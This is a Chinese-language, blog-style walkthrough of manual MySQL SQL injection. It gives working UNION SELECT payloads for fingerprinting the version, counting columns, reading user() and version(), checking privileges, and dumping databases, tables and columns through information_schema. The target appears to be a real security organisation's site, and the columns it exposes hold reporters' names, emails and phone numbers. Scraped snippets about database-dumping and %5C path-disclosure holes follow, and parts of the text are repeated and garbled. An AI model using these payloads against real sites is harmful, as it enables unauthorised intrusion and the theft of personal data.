1.判斷版本 and ord(mid(version(),1,1))>51 返回正常,說明大於4.0版本,支援ounion查詢
2.猜解字段數目,
用order by也可以猜,
也可以用union select乙個乙個的猜解
and 2=4 union select 1,2,3,4,5,6,7,8,9--
3.檢視資料庫版本及當前使用者,
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
資料庫版本5.1.35,據說mysql4.1以上版本支援concat函式,
4.判斷有沒有寫許可權
and (select count(*) from mysql.user)>0--
返回錯誤,沒有寫許可權
手動猜表
5.查庫,以前用union select 1,2,3,schema_name,5,6,n from information_schema.schemata limit 0,1
土耳其黑客的手法
成功查出所有資料庫,國外的黑客就是不一般。資料庫如下:
information_schema,advisory,ir,mad,member,mysql,twcert,vuldb,vulscandb
6.爆表,爆的是twcert庫
爆出如下表
downloadfile,irsys,newsdata,secrpt,secrpt_big5
7.爆列名,這次爆的是irsys表
爆出如下列
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
8.查詢字段數,到這一步,國內很少有黑客去查詢欄位數的,直接用limit n,1去查詢,直接n到報錯為止。
返回是3,說明每個列裡有3個地段
9.爆欄位內容
爆出name列的第乙個欄位的內容
爆出name列的第二個欄位的內容
mysql暴庫 大牛教你查庫暴庫
and ord mid version 1,1 51 返回正常,說明大於4.0版本,支援ounion查詢 2.猜解字段數目,用order by也可以猜,也可以用union select乙個乙個的猜解 and 2 4 union select 1,2,3,4,5,6,7,8,9 3.檢視資料庫版本及當...
5C 暴庫漏洞
的unicode是 5c,主要就是暴庫漏洞 那麼,我看到下面四種情況 1,直接暴庫,解決方法在conn.asp中加入on error resume next duoluo.webdream dlog 5cshowlog.asp?cat id 16 log id 444 2,不顯示任何資訊,原因已打入...
對暴庫的一點認識
去年的時候曾經有一段時間研究過ie雙解碼,所以對暴庫有一定的認識,前些天終於收到黑客的雜誌,裡面看了一篇臨的文章,下面我也談談個人對那篇文章的認識,這裡要說的是,大家如果再深入點研 究下去,就會發現,暴庫的利用不只是這麼簡單,還會有更多可以用的東東。暴庫的方式有多種多樣,我知道的就有3種以上,常見的...